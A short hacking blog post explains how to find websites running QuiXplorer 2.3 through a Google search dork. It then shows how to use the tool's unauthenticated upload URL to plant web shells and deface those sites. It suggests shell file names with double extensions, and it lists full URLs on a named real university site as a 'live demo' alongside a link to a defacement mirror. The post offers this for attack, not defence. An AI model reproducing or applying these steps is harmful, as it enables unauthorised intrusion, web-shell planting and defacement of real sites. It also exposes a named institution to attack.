"QuiXplorer 2.3 <= Bugtraq File Upload Vulnerability" Upload shell and deface easily

Posted on by Unknown


computer-virus-iran-power-nuclear.jpg (400×300)


open Google.com and type this dork 
intitle:"QuiXplorer 2.3 - the QuiX project"


you'll see a lot of sites, some big websites are vuln too like haeward university website,
select any website from search results
Vulnerablity




http://[localhost]/[path]/index.php?action=list&order=name&srt=yes




http://site.com/[xyz]/index.php?action=list&order=name&srt=yes
 after Going to this you will saw a file manager 
you can upload your files here


find this edit file create file etc icons in page and click on last, its upload option







You can direct upload too with chnaging url, just put action=upload&order=name&srt=yes
after index.php?
example : 
http://site.com/[xyz]/index.php?action=upload&order=name&srt=yes

Shell Example : shell.php, shell.asp, shell.html, shell.php.jpg, shell.asp.jpg, or,,
- anything support file
click On you file For view 
Live demo : 
http://www.hcs.harvard.edu/~eac/letters/files/index.php?action=list&order=name&srt=yes

http://www.hcs.harvard.edu/~eac/letters/files/index.php?action=upload&order=name&srt=yes

http://www.hcs.harvard.edu/~eac/letters/filestorage/  
i know some asshole will chnage the deface 
so its mirrOr of defacements http://attack-h.org/attack/?id=8452

This entry was posted in

Leave a Reply

About Me

Unknown
View my complete profile
    Blogger Widgets

A Blog by 3gZone & Trickdad & Thanks to TelecomTalk